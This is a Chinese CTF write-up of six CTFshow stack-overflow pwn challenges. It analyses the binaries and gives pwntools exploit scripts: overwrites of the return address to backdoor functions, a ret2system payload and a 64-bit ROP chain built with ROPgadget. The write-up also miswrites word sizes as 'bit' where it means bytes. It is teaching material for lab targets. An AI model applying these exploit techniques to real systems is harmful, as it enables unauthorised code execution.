本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题
所用工具:linux环境下的虚拟机、IDA Pro、exeinfope
以下操作中小编用的都是自己的kali环境
pwn35
把附件拖到IDA里,可以看到ctfshow函数会在参数个数大于1的时候触发,因为argc初始值就是1,所以只要有输入就会触发
ctfshow函数是一个可以利用栈溢出的strcpy函数,长度是104,那么只要输入大于104就可以实现栈溢出,输出flag
pwn36
检查附件,没有保护机制
用IDA打开,可以找到get_flag函数,且这个函数没有被引用,根据题目提示,应该这就是那个后门函数
跟进主函数中的ctfshow函数,可以看到是gets函数,且输入没有限制,那么就能利用栈溢出来调用后门函数。具体地,就是将后门函数的地址覆盖到ctfshow函数的返回地址中,引发调用
覆盖的地址长度为0x28+ebp的值(ebp后面是返回地址,前面是局部变量s数组的栈空间)+get_flag函数的地址,最终就是0x28+0x4+p32(0x08048586)
根据上面信息写出以下exp
from pwn import *
p = remote("pwn.challenge.ctf.show", "28143")
offset = 0x28 + 0x4
get_flag_addr = 0x8048586
payload = offset * b'a' + p32(get_flag_addr)
p.sendline(payload)
pwn37
32位程序,checksec命令检查附件,NX保护是开启的,因此不能通过发送shellcode直接获得shell
用IDA打开附件,主函数中只有ctfshow函数
跟进ctfshow函数,是一个可以利用栈溢出的read函数
可以找到backdoor后门函数,其作用是调用system函数执行/bin/sh,那么思路清晰,利用和上一题一样的栈溢出脚本,再加上交互p.interactive(),就能拿到shell,cat flag了
exp如下
from pwn import *
p = remote("pwn.challenge.ctf.show", "28167")
offset = 0x12 + 0x4
get_flag_addr = 0x08048521
payload = offset * b'a' + p32(get_flag_addr)
p.sendline(payload)
p.interactive()
pwn38
checksec命令检查,开启了NX保护
用IDA查看附件,和上一题一样,只不过这次是64位的程序,返回地址和寄存器的长度都是8个字节,覆盖长度变为了0xA+0x8
值得注意的是,这里需要用lea命令的地址作为覆盖的地址,而不是backdoor函数的地址,小编才疏学浅不知道为什么,可能是修改了栈的值导致出现错误
exp如下
from pwn import *
p = remote("pwn.challenge.ctf.show", "28121")
offset = 0xA + 0x8
get_flag_addr = 0x40065B
payload = offset * b'a' + p64(get_flag_addr)
p.sendline(payload)
p.interactive()
pwn39
NX保护开启
32位,依旧是栈溢出+后门函数
但是这里不是system("/bin/sh")了,而是将函数和参数分割,两者都在程序中,所以可以通过栈溢出自行构造完整后门,栈上传参
自行构造完整后门(调用链)对溢出长度有要求,至少要能溢出除ip以外再多2个机器字长(32位4 bit;64位8bit),用于写入调用步骤
exp如下:
#payload=[填充]+[system@plt]+[4bytes填充]+[参数]
from pwn import *
p = remote("pwn.challenge.ctf.show", "28113")
offset = 0x12 + 0x4
system_addr = 0x080483A0
binsh_addr = 0x8048750
payload = offset * b'a' + p32(system_addr) + b'aaaa' + p32(binsh_addr)
p.sendline(payload)
p.interactive()
pwn40
NX保护开启
思路和上题一样,但是是64位,机器字长为8bit。参数1~6个,使用寄存器传递;参数大于6个, 多出来的参数使用栈传递
exp如下:
这里介绍一下ROPgadget工具,该工具可以绕过NX保护,在栈缓冲区溢出的基础上,利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时,前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。
有的题,里面既没有现成的system也没有/bin/sh字符串,也没有提供libc.so给我们,那么我们要做的就是想办法泄露libc地址,拿到system函数和/bin/sh字符串;我们就需要获取rdi, rsi, rdx, rcx, r8, r9它们的地址,首先要获取的是rdi的地址。这就是 ROPgadget 的作用。
回到本题,下面利用ROPgadget获得rdi的地址
ROPgadget --binary 文件名 --only "pop|ret" | grep rdi
获取ret的地址
ROPgadget --binary pwn
exp如下:
#payload=[填充]+[pop_rdi_ret]+[参数]+[system@plt]
from pwn import *
p = remote("pwn.challenge.ctf.show", "28151")
offset = 0xA + 0x8
ret_addr = 0x00000000004004fe
system_addr = 0x400520
binsh_addr = 0x400808
rdi_addr = 0x00000000004007e3
payload = offset * b'a' + p64(rdi_addr) + p64(binsh_addr) + p64(ret_addr) + p64(system_addr)
#这里ret_addr的作用是作为一个8字节的间接跳转指令,用于绕过栈中的返回地址,以达到执行system函数的目的
p.sendline(payload)
p.interactive()
总结:
1.pwn36-pwn38:完整后门&溢出长度大于等于ip。只要我们调用这个后门函数,不需要其他额外的操作就能getshell,通常是system('/bin/sh'),write(1,'flag',32)等形式。
payload = [填充] + [get_shell_addr]
2.pwn39、wn40:残缺后门&溢出长度远大于ip。这里指的远大于ip,意思是可以溢出覆盖除了ip以外的2个以上的(一般情况,实际情况实际分析)机器字长。残缺后门的形式多种多样:提供诸如system等关键函数,flag、/bin/sh等字符串,某些gadget等。
payload=[填充]+[system@plt]+[4bit填充]+[参数] #32位
payload=[填充]+[pop_rdi_ret]+[参数]+[system@plt] #64位